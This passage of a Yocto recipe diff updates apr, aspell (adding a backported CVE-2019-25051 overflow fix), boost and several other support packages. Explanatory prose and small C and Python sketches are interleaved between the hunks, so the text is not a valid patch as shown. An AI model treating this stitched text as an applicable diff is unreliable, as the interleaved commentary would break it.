-it use the "AC_TRY_RUN" macro, this macro let the off_t to 8, when cross
-compiling enable.
-
-So it was hardcoded for cross compiling, we should detect it dynamic based on
-the sysroot's glibc. We change it to the following:
-
- AC_CHECK_SIZEOF(off_t)
-
-The same for the following hardcoded types for cross compiling:
-
- pid_t 8
- ssize_t 8
- size_t 8
- off_t 8
-
-Change the above correspondingly.
-
-Signed-off-by: Dengke Du <dengke.du@windriver.com>
-
-Upstream-Status: Pending
-
----
- configure.in | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/configure.in b/configure.in
-index 27b8539..fb408d1 100644
---- a/configure.in
-+++ b/configure.in
-@@ -1801,7 +1801,7 @@ else
- socklen_t_value="int"
- fi
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], pid_t, 8)
-+AC_CHECK_SIZEOF(pid_t)
-
- if test "$ac_cv_sizeof_pid_t" = "$ac_cv_sizeof_short"; then
- pid_t_fmt='#define APR_PID_T_FMT "hd"'
-@@ -1873,7 +1873,7 @@ APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned long, lu, [size_t_fmt="lu"], [
- APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned int, u, [size_t_fmt="u"])
- ])
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], ssize_t, 8)
-+AC_CHECK_SIZEOF(ssize_t)
-
- dnl the else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_ssize_t])
-@@ -1891,7 +1891,7 @@ fi
-
- ssize_t_fmt="#define APR_SSIZE_T_FMT \"$ssize_t_fmt\""
-
--APR_CHECK_SIZEOF_EXTENDED([#include <stddef.h>], size_t, 8)
-+AC_CHECK_SIZEOF(size_t)
-
- # else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_size_t])
-@@ -1909,7 +1909,7 @@ fi
-
- size_t_fmt="#define APR_SIZE_T_FMT \"$size_t_fmt\""
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-+AC_CHECK_SIZEOF(off_t)
-
- if test "${ac_cv_sizeof_off_t}${apr_cv_use_lfs64}" = "4yes"; then
- # Enable LFS
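The patch deleted above swapped the run-time size probes (APR_CHECK_SIZEOF_EXTENDED is built on AC_TRY_RUN, which cannot execute target code when cross-compiling and therefore fell back to the hardcoded value of 8) for the compile-only AC_CHECK_SIZEOF, which asks the target compiler and sysroot instead. A compile-only probe reduces to something like the fragment below, answered entirely at compile time; BUILD_ASSERT is a made-up helper for the example, not an autoconf macro.

#include <sys/types.h>

/* Classic negative-array-size trick: the typedef only compiles when the
   condition holds, so the target toolchain answers the question without
   any program ever being run.                                            */
#define BUILD_ASSERT(cond, name) typedef char name[(cond) ? 1 : -1]

/* On a 32-bit glibc target this compiles only with large file support
   (e.g. -D_FILE_OFFSET_BITS=64); on 64-bit targets it always compiles.   */
BUILD_ASSERT(sizeof(off_t) == 8, off_t_is_64_bit);

int main(void) { return 0; }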
diff --git a/meta/recipes-support/apr/apr/libtoolize_check.patch b/meta/recipes-support/apr/apr/libtoolize_check.patch
index 740792e6b0..80ce43caa4 100644
--- a/meta/recipes-support/apr/apr/libtoolize_check.patch
+++ b/meta/recipes-support/apr/apr/libtoolize_check.patch
@@ -1,6 +1,7 @@
+From 17835709bc55657b7af1f7c99b3f572b819cf97e Mon Sep 17 00:00:00 2001
From: Helmut Grohne <helmut@subdivi.de>
-Subject: check for libtoolize rather than libtool
-Last-Update: 2014-09-19
+Date: Tue, 7 Feb 2023 07:04:00 +0000
+Subject: [PATCH] check for libtoolize rather than libtool
libtool is now in package libtool-bin, but apr only needs libtoolize.
@@ -8,14 +9,22 @@ Upstream-Status: Pending [ from debian: https://sources.debian.org/data/main/a/a
Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
---- apr.orig/build/buildcheck.sh
-+++ apr/build/buildcheck.sh
-@@ -39,11 +39,11 @@ fi
+---
+ build/buildcheck.sh | 10 ++++------
+ 1 file changed, 4 insertions(+), 6 deletions(-)
+
+diff --git a/build/buildcheck.sh b/build/buildcheck.sh
+index 44921b5..08bc8a8 100755
+--- a/build/buildcheck.sh
++++ b/build/buildcheck.sh
+@@ -39,13 +39,11 @@ fi
# ltmain.sh (GNU libtool 1.1361 2004/01/02 23:10:52) 1.5a
# output is multiline from 1.5 onwards
-# Require libtool 1.4 or newer
--libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
+-if test -z "$libtool"; then
+- libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
+-fi
-lt_pversion=`$libtool --version 2>/dev/null|sed -e 's/([^)]*)//g;s/^[^0-9]*//;s/[- ].*//g;q'`
+# Require libtoolize 1.4 or newer
+libtoolize=`build/PrintPath glibtoolize1 glibtoolize libtoolize libtoolize15 libtoolize14`
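The patched buildcheck.sh now locates libtoolize instead of libtool, using build/PrintPath to return the first matching name found on PATH. A minimal Python sketch of that kind of lookup, using the candidate names from the hunk above (the helper function name is ours, not apr's):

    # Sketch of a PrintPath-style lookup: return the first candidate found on PATH.
    # Candidate names are the ones listed in the patched buildcheck.sh.
    import shutil

    def find_first_on_path(candidates):
        for name in candidates:
            path = shutil.which(name)
            if path:
                return path
        return None

    libtoolize = find_first_on_path(
        ["glibtoolize1", "glibtoolize", "libtoolize", "libtoolize15", "libtoolize14"])
    print(libtoolize or "libtoolize not found")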
diff --git a/meta/recipes-support/apr/apr_1.7.0.bb b/meta/recipes-support/apr/apr_1.7.2.bb
index 7073af8c98..807dce21da 100644
--- a/meta/recipes-support/apr/apr_1.7.0.bb
+++ b/meta/recipes-support/apr/apr_1.7.2.bb
@@ -1,4 +1,8 @@
SUMMARY = "Apache Portable Runtime (APR) library"
+
+DESCRIPTION = "Create and maintain software libraries that provide a predictable \
+and consistent interface to underlying platform-specific implementations."
+
HOMEPAGE = "http://apr.apache.org/"
SECTION = "libs"
DEPENDS = "util-linux"
@@ -12,17 +16,15 @@ BBCLASSEXTEND = "native nativesdk"
SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \
file://run-ptest \
file://0002-apr-Remove-workdir-path-references-from-installed-ap.patch \
- file://0003-Makefile.in-configure.in-support-cross-compiling.patch \
file://0004-Fix-packet-discards-HTTP-redirect.patch \
file://0005-configure.in-fix-LTFLAGS-to-make-it-work-with-ccache.patch \
- file://0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch \
file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \
file://libtoolize_check.patch \
file://0001-Add-option-to-disable-timed-dependant-tests.patch \
+ file://0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch \
"
-SRC_URI[md5sum] = "7a14a83d664e87599ea25ff4432e48a7"
-SRC_URI[sha256sum] = "e2e148f0b2e99b8e5c6caa09f6d4fb4dd3e83f744aa72a952f94f5a14436f7ea"
+SRC_URI[sha256sum] = "75e77cc86776c030c0a5c408dfbd0bf2a0b75eed5351e52d5439fa1e5509a43e"
inherit autotools-brokensep lib_package binconfig multilib_header ptest multilib_script
@@ -30,17 +32,30 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
# Added to fix some issues with cmake. Refer to https://github.com/bmwcarit/meta-ros/issues/68#issuecomment-19896928
CACHED_CONFIGUREVARS += "apr_cv_mutex_recursive=yes"
-
+# Enable largefile
+CACHED_CONFIGUREVARS += "apr_cv_use_lfs64=yes"
+# Additional AC_TRY_RUN tests which will need to be cached for cross compile
+CACHED_CONFIGUREVARS += "apr_cv_epoll=yes epoll_create1=yes apr_cv_sock_cloexec=yes \
+ ac_cv_struct_rlimit=yes \
+ ac_cv_func_sem_open=yes \
+ apr_cv_process_shared_works=yes \
+ apr_cv_mutex_robust_shared=yes \
+ "
# Also suppress trying to use sctp.
#
CACHED_CONFIGUREVARS += "ac_cv_header_netinet_sctp_h=no ac_cv_header_netinet_sctp_uio_h=no"
-CACHED_CONFIGUREVARS += "ac_cv_sizeof_struct_iovec=yes"
+# ac_cv_sizeof_struct_iovec is deduced using a runtime check, which fails when cross-compiling
+CACHED_CONFIGUREVARS += "${@['ac_cv_sizeof_struct_iovec=16','ac_cv_sizeof_struct_iovec=8'][d.getVar('SITEINFO_BITS') != '32']}"
+
CACHED_CONFIGUREVARS += "ac_cv_file__dev_zero=yes"
+CACHED_CONFIGUREVARS:append:libc-musl = " ac_cv_strerror_r_rc_int=yes"
PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
+PACKAGECONFIG:append:libc-musl = " xsi-strerror"
PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
PACKAGECONFIG[timed-tests] = "--enable-timed-tests,--disable-timed-tests,"
+PACKAGECONFIG[xsi-strerror] = "ac_cv_strerror_r_rc_int=yes,ac_cv_strerror_r_rc_int=no,"
do_configure_prepend() {
# Avoid absolute paths for grep since it causes failures
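The comments above explain why these AC_TRY_RUN answers are pre-seeded: the tests cannot execute on the build host when cross-compiling, so the results are supplied through CACHED_CONFIGUREVARS, and the struct iovec size is chosen by an inline Python expression keyed on SITEINFO_BITS. A minimal sketch of that selection idiom in plain Python (d.getVar replaced by a parameter):

    # Sketch of the boolean-indexing idiom used by the ${@...} expression above:
    # a False result selects the first list element, True selects the second.
    values = ["ac_cv_sizeof_struct_iovec=16", "ac_cv_sizeof_struct_iovec=8"]

    def pick_iovec_cache_var(siteinfo_bits):
        # mirrors [...][d.getVar('SITEINFO_BITS') != '32'] from the recipe
        return values[siteinfo_bits != "32"]

    print(pick_iovec_cache_var("32"))   # first element
    print(pick_iovec_cache_var("64"))   # second element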
diff --git a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
index 21bbcab3d3..d1db562bb5 100644
--- a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
+++ b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
@@ -2,6 +2,7 @@
# Released under the MIT license (see COPYING.MIT for the terms)
SUMMARY = "Glibc hierarchical argument parsing standalone library"
+DESCRIPTION = "Standalone version of arguments parsing functions from GLIBC"
HOMEPAGE = "http://www.lysator.liu.se/~nisse/misc/"
LICENSE = "LGPL-2.1"
LIC_FILES_CHKSUM = "file://argp.h;beginline=1;endline=20;md5=008b7e53dea6f9e1d9fdef0d9cf3184a"
diff --git a/meta/recipes-support/aspell/aspell_0.60.8.bb b/meta/recipes-support/aspell/aspell_0.60.8.bb
index 629987810a..9147c820e7 100644
--- a/meta/recipes-support/aspell/aspell_0.60.8.bb
+++ b/meta/recipes-support/aspell/aspell_0.60.8.bb
@@ -1,10 +1,21 @@
SUMMARY = "GNU Aspell spell-checker"
+
+DESCRIPTION = "Spell checker designed to eventually replace Ispell. \
+It can either be used as a library or as an independent spell checker. \
+Its main feature is that it does a better job of suggesting possible \
+replacements for a misspelled word than just about any other spell \
+checker out there for the English language."
+
SECTION = "console/utils"
+HOMEPAGE = "http://aspell.net/"
+
LICENSE = "LGPLv2 | LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
-SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz"
+SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz \
+ file://CVE-2019-25051.patch \
+"
SRC_URI[md5sum] = "012fa9209203ae4e5a61c2a668fd10e3"
SRC_URI[sha256sum] = "f9b77e515334a751b2e60daab5db23499e26c9209f5e7b7443b05235ad0226f2"
diff --git a/meta/recipes-support/aspell/files/CVE-2019-25051.patch b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
new file mode 100644
index 0000000000..8513f6de79
--- /dev/null
+++ b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
@@ -0,0 +1,101 @@
+From 0718b375425aad8e54e1150313b862e4c6fd324a Mon Sep 17 00:00:00 2001
+From: Kevin Atkinson <kevina@gnu.org>
+Date: Sat, 21 Dec 2019 20:32:47 +0000
+Subject: [PATCH] objstack: assert that the alloc size will fit within a chunk
+ to prevent a buffer overflow
+
+Bug found using OSS-Fuzz.
+
+Upstream-Status: Backport
+[https://github.com/gnuaspell/aspell/commit/0718b375425aad8e54e1150313b862e4c6fd324a]
+CVE: CVE-2019-25051
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ common/objstack.hpp | 18 ++++++++++++++----
+ 1 file changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/common/objstack.hpp b/common/objstack.hpp
+index 3997bf7..bd97ccd 100644
+--- a/common/objstack.hpp
++++ b/common/objstack.hpp
+@@ -5,6 +5,7 @@
+ #include "parm_string.hpp"
+ #include <stdlib.h>
+ #include <assert.h>
++#include <stddef.h>
+
+ namespace acommon {
+
+@@ -26,6 +27,12 @@ class ObjStack
+ byte * temp_end;
+ void setup_chunk();
+ void new_chunk();
++ bool will_overflow(size_t sz) const {
++ return offsetof(Node,data) + sz > chunk_size;
++ }
++ void check_size(size_t sz) {
++ assert(!will_overflow(sz));
++ }
+
+ ObjStack(const ObjStack &);
+ void operator=(const ObjStack &);
+@@ -56,7 +63,7 @@ class ObjStack
+ void * alloc_bottom(size_t size) {
+ byte * tmp = bottom;
+ bottom += size;
+- if (bottom > top) {new_chunk(); tmp = bottom; bottom += size;}
++ if (bottom > top) {check_size(size); new_chunk(); tmp = bottom; bottom += size;}
+ return tmp;
+ }
+ // This alloc_bottom will insure that the object is aligned based on the
+@@ -66,7 +73,7 @@ class ObjStack
+ align_bottom(align);
+ byte * tmp = bottom;
+ bottom += size;
+- if (bottom > top) {new_chunk(); goto loop;}
++ if (bottom > top) {check_size(size); new_chunk(); goto loop;}
+ return tmp;
+ }
+ char * dup_bottom(ParmString str) {
+@@ -79,7 +86,7 @@ class ObjStack
+ // always be aligned as such.
+ void * alloc_top(size_t size) {
+ top -= size;
+- if (top < bottom) {new_chunk(); top -= size;}
++ if (top < bottom) {check_size(size); new_chunk(); top -= size;}
+ return top;
+ }
+ // This alloc_top will insure that the object is aligned based on
+@@ -88,7 +95,7 @@ class ObjStack
+ {loop:
+ top -= size;
+ align_top(align);
+- if (top < bottom) {new_chunk(); goto loop;}
++ if (top < bottom) {check_size(size); new_chunk(); goto loop;}
+ return top;
+ }
+ char * dup_top(ParmString str) {
+@@ -117,6 +124,7 @@ class ObjStack
+ void * alloc_temp(size_t size) {
+ temp_end = bottom + size;
+ if (temp_end > top) {
++ check_size(size);
+ new_chunk();
+ temp_end = bottom + size;
+ }
+@@ -131,6 +139,7 @@ class ObjStack
+ } else {
+ size_t s = temp_end - bottom;
+ byte * p = bottom;
++ check_size(size);
+ new_chunk();
+ memcpy(bottom, p, s);
+ temp_end = bottom + size;
+@@ -150,6 +159,7 @@ class ObjStack
+ } else {
+ size_t s = temp_end - bottom;
+ byte * p = bottom;
++ check_size(size);
+ new_chunk();
+ memcpy(bottom, p, s);
+ temp_end = bottom + size;
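The commit message above describes the fix: before falling back to a fresh chunk, assert that offsetof(Node, data) plus the requested size still fits within chunk_size. A small Python model of that check, with assumed values standing in for the real chunk layout:

    # Model of the bounds check the patch adds: an allocation is only allowed to
    # trigger a new chunk if the node header plus the size still fits in one chunk.
    CHUNK_SIZE = 4096    # assumed chunk size
    NODE_HEADER = 16     # stands in for offsetof(Node, data)

    def will_overflow(size):
        return NODE_HEADER + size > CHUNK_SIZE

    def check_size(size):
        assert not will_overflow(size), "allocation larger than a chunk"

    check_size(1024)        # fits: no error
    # check_size(8192)      # would raise AssertionError, as the C++ assert aborts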
diff --git a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
index c297912588..ad30617e56 100644
--- a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
+++ b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
@@ -1,5 +1,7 @@
SUMMARY = "AT-SPI 2 Toolkit Bridge"
+DESCRIPTION = "Contains a library that bridges ATK to At-Spi2 D-Bus service. Toolkit widgets use it to provide their content to screen readers such as Orca."
HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
+BUGTRACKER = "http://bugzilla.gnome.org/"
LICENSE = "LGPL-2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
diff --git a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
index 84e05e77fc..2ad09878b7 100644
--- a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
+++ b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
@@ -1,5 +1,9 @@
SUMMARY = "Assistive Technology Service Provider Interface (dbus core)"
+
+DESCRIPTION = "It provides a Service Provider Interface for the Assistive Technologies available on the GNOME platform and a library against which applications can be linked."
+
HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
+BUGTRACKER = "http://bugzilla.gnome.org/"
LICENSE = "LGPL-2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
diff --git a/meta/recipes-support/atk/atk_2.34.1.bb b/meta/recipes-support/atk/atk_2.34.1.bb
index 741350ffe5..25ef3c6c52 100644
--- a/meta/recipes-support/atk/atk_2.34.1.bb
+++ b/meta/recipes-support/atk/atk_2.34.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Accessibility toolkit for GNOME"
+DESCRIPTION = "Provides application programming interfaces (APIs) for implementing accessibility support in software."
HOMEPAGE = "https://wiki.gnome.org/Accessibility"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/atk/-/issues"
SECTION = "x11/libs"
diff --git a/meta/recipes-support/attr/acl_2.2.53.bb b/meta/recipes-support/attr/acl_2.2.53.bb
index 5bb50f77f7..7cee45948d 100644
--- a/meta/recipes-support/attr/acl_2.2.53.bb
+++ b/meta/recipes-support/attr/acl_2.2.53.bb
@@ -1,5 +1,10 @@
SUMMARY = "Utilities for managing POSIX Access Control Lists"
+DESCRIPTION = "ACL allows you to provide different levels of access to files \
+and folders for different users."
+
HOMEPAGE = "http://savannah.nongnu.org/projects/acl/"
+BUGTRACKER = "http://savannah.nongnu.org/bugs/?group=acl"
+
SECTION = "libs"
LICENSE = "LGPLv2.1+ & GPLv2+"
diff --git a/meta/recipes-support/attr/attr.inc b/meta/recipes-support/attr/attr.inc
index f13a83a7b4..30ba0b4445 100644
--- a/meta/recipes-support/attr/attr.inc
+++ b/meta/recipes-support/attr/attr.inc
@@ -1,4 +1,6 @@
SUMMARY = "Utilities for manipulating filesystem extended attributes"
+DESCRIPTION = "Implement the ability for a user to attach name:value pairs to objects within the XFS filesystem."
+
HOMEPAGE = "http://savannah.nongnu.org/projects/attr/"
SECTION = "libs"
diff --git a/meta/recipes-support/bash-completion/bash-completion_2.10.bb b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
index 93e7d9dc3c..1f99bf7386 100644
--- a/meta/recipes-support/bash-completion/bash-completion_2.10.bb
+++ b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
@@ -1,4 +1,9 @@
SUMMARY = "Programmable Completion for Bash 4"
+DESCRIPTION = "Collection of command line command completions for the Bash shell, \
+collection of helper functions to assist in creating new completions, \
+and set of facilities for loading completions automatically on demand, as well \
+as installing them."
+
HOMEPAGE = "https://github.com/scop/bash-completion"
BUGTRACKER = "https://github.com/scop/bash-completion/issues"
diff --git a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
index 7c4db85b32..6a93cacc18 100644
--- a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
+++ b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
@@ -9,7 +9,7 @@ SECTION = "console/utils"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/intel/${BPN}"
+SRC_URI = "git://github.com/intel/${BPN};branch=main;protocol=https"
SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d"
S = "${WORKDIR}/git"
@@ -22,4 +22,4 @@ RDEPENDS_${PN} = "python3-core python3-compression python3-mmap python3-setuptoo
inherit python3native
inherit setuptools3
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/boost/boost-1.72.0.inc b/meta/recipes-support/boost/boost-1.72.0.inc
index 55a095bf1c..d152895f09 100644
--- a/meta/recipes-support/boost/boost-1.72.0.inc
+++ b/meta/recipes-support/boost/boost-1.72.0.inc
@@ -11,7 +11,7 @@ BOOST_VER = "${@"_".join(d.getVar("PV").split("."))}"
BOOST_MAJ = "${@"_".join(d.getVar("PV").split(".")[0:2])}"
BOOST_P = "boost_${BOOST_VER}"
-SRC_URI = "https://dl.bintray.com/boostorg/release/${PV}/source/${BOOST_P}.tar.bz2"
+SRC_URI = "https://boostorg.jfrog.io/artifactory/main/release/${PV}/source/${BOOST_P}.tar.bz2"
SRC_URI[md5sum] = "cb40943d2a2cb8ce08d42bc48b0f84f0"
SRC_URI[sha256sum] = "59c9b274bc451cf91a9ba1dd2c7fdcaf5d60b1b3aa83f2c9fa143417cc660722"
diff --git a/meta/recipes-support/boost/boost.inc b/meta/recipes-support/boost/boost.inc
index 8eb9494381..1c13fb3599 100644
--- a/meta/recipes-support/boost/boost.inc
+++ b/meta/recipes-support/boost/boost.inc
@@ -1,4 +1,8 @@
SUMMARY = "Free peer-reviewed portable C++ source libraries"
+DESCRIPTION = "Provides free peer-reviewed portable C++ source libraries. The emphasis is on libraries which work well with the C++ \
+Standard Library. One goal is to establish 'existing practice' and \
+provide reference implementations so that the Boost libraries are suitable for eventual standardization. Some of the libraries have already been proposed for inclusion in the C++ Standards Committee's \
+upcoming C++ Standard Library Technical Report."
SECTION = "libs"
DEPENDS = "bjam-native zlib bzip2"
@@ -161,7 +165,7 @@ do_configure() {
# D2194:Fixing the failure of "error: duplicate initialization of gcc with the following parameters" during compilation.
rm -f ${WORKDIR}/user-config.jam
- echo 'using gcc : 4.3.1 : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
+ echo 'using gcc : : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
# If we want Python then we need to tell Boost *exactly* where to find it
if ${@bb.utils.contains('BOOST_LIBS', 'python', 'true', 'false', d)}; then
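The do_configure change drops the hard-coded "4.3.1" toolset version so b2 derives the version from the compiler itself, avoiding the duplicate-initialization error cited in the comment. A rough Python sketch of producing that user-config.jam line from the usual environment variables (illustrative only; the recipe does this with a shell echo):

    # Sketch: build the 'using gcc' line written to user-config.jam, leaving the
    # toolset version empty as in the patched recipe.
    import os

    cxx = os.environ.get("CXX", "g++")
    cflags = os.environ.get("CFLAGS", "")
    cxxflags = os.environ.get("CXXFLAGS", "")
    ldflags = os.environ.get("LDFLAGS", "")

    line = ('using gcc : : %s : <cflags>"%s" <cxxflags>"%s" <linkflags>"%s" ;'
            % (cxx, cflags, cxxflags, ldflags))

    with open("user-config.jam", "w") as jam:   # recipe removes the old file first
        jam.write(line + "\n")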
diff --git a/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
new file mode 100644
index 0000000000..46c706931b
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
@@ -0,0 +1,32 @@
+From f9d0e594d43afcb4ab0043117249feb266ba4515 Mon Sep 17 00:00:00 2001
+From: Romain Geissler <romain.geissler@amadeus.com>
+Date: Tue, 10 Aug 2021 14:22:28 +0000
+Subject: [PATCH] Fix -Wsign-compare warning with glibc 2.34 on Linux
+ platforms.
+
+In file included from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread_only.hpp:17,
+ from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread.hpp:12,
+ from src/GetTest.cpp:12:
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp: In member function 'void boost::thread_attributes::set_stack_size(std::size_t)':
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp:61:19: error: comparison of integer expressions of different signedness: 'std::size_t' {aka 'long unsigned int'} and 'long int' [-Werror=sign-compare]
+ 61 | if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+ | ^
+
+Upstream-Status: Backport [1.78.0 https://github.com/boostorg/thread/commit/f9d0e594d43afcb4ab0043117249feb266ba4515]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index bc9b1367..c43b276d 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -58,7 +58,7 @@ namespace boost
+ std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+ #ifdef PTHREAD_STACK_MIN
+- if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
++ if (size<static_cast<std::size_t>(PTHREAD_STACK_MIN)) size=PTHREAD_STACK_MIN;
+ #endif
+ size = ((size+page_size-1)/page_size)*page_size;
+ int res = pthread_attr_setstacksize(&val_, size);
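The warning arises because std::size_t is unsigned while PTHREAD_STACK_MIN expands to a signed long on glibc 2.34; the backported fix simply casts the macro. The surrounding logic visible in the hunk, clamping the requested size and rounding it up to whole pages, sketched in Python with assumed constants:

    # The stack-size handling around the patched comparison: clamp to
    # PTHREAD_STACK_MIN, then round up to a whole number of pages.
    PTHREAD_STACK_MIN = 16384   # assumed; on glibc 2.34 the macro is no longer a constant
    PAGE_SIZE = 4096            # assumed sysconf(_SC_PAGESIZE)

    def effective_stack_size(requested):
        size = max(requested, PTHREAD_STACK_MIN)
        return ((size + PAGE_SIZE - 1) // PAGE_SIZE) * PAGE_SIZE

    print(effective_stack_size(1000))    # 16384: clamped, already page-aligned
    print(effective_stack_size(20000))   # 20480: rounded up to five pages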
diff --git a/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
new file mode 100644
index 0000000000..3784cf9165
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
@@ -0,0 +1,24 @@
+From 74fb0a26099bc51d717f5f154b37231ce7df3e98 Mon Sep 17 00:00:00 2001
+From: Rob Boehne <robb@datalogics.com>
+Date: Wed, 20 Nov 2019 11:25:20 -0600
+Subject: [PATCH] Revert change to elide a warning that caused Solaris builds
+ to fail.
+
+Upstream-Status: Backport [1.73.0 https://github.com/boostorg/thread/commit/74fb0a26099bc51d717f5f154b37231ce7df3e98]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index aefbeb43..bc9b1367 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -57,7 +57,7 @@ namespace boost
+ #else
+ std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+-#if PTHREAD_STACK_MIN > 0
++#ifdef PTHREAD_STACK_MIN
+ if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+ #endif
+ size = ((size+page_size-1)/page_size)*page_size;
diff --git a/meta/recipes-support/boost/boost/arm-intrinsics.patch b/meta/recipes-support/boost/boost/arm-intrinsics.patch
deleted file mode 100644
index fe85c69a82..0000000000
--- a/meta/recipes-support/boost/boost/arm-intrinsics.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-Upstream-Status: Backport
-
-8/17/2010 - rebased to 1.44 by Qing He <qing.he@intel.com>
-
-diff --git a/boost/smart_ptr/detail/atomic_count_sync.hpp b/boost/smart_ptr/detail/atomic_count_sync.hpp
-index b6359b5..78b1cc2 100644
---- a/boost/smart_ptr/detail/atomic_count_sync.hpp
-+++ b/boost/smart_ptr/detail/atomic_count_sync.hpp
-@@ -33,17 +33,46 @@ public:
-
- long operator++()
- {
-+#ifdef __ARM_ARCH_7A__
-+ int v1, tmp;
-+ asm volatile ("1: \n\t"
-+ "ldrex %0, %1 \n\t"
-+ "add %0 ,%0, #1 \n\t"
-+ "strex %2, %0, %1 \n\t"
-+ "cmp %2, #0 \n\t"
-+ "bne 1b \n\t"
-+ : "=&r" (v1), "+Q"(value_), "=&r"(tmp)
-+ );
-+#else
- return __sync_add_and_fetch( &value_, 1 );
-+#endif
- }
-
- long operator--()
- {
-+#ifdef __ARM_ARCH_7A__
-+ int v1, tmp;
-+ asm volatile ("1: \n\t"
-+ "ldrex %0, %1 \n\t"
-+ "sub %0 ,%0, #1 \n\t"
-+ "strex %2, %0, %1 \n\t"
-+ "cmp %2, #0 \n\t"
-+ "bne 1b \n\t"
-+ : "=&r" (v1), "+Q"(value_), "=&r"(tmp)
-+ );
-+ return value_;
-+#else
- return __sync_add_and_fetch( &value_, -1 );
-+#endif
- }
-
- operator long() const
- {
-+#if __ARM_ARCH_7A__
-+ return value_;
-+#else
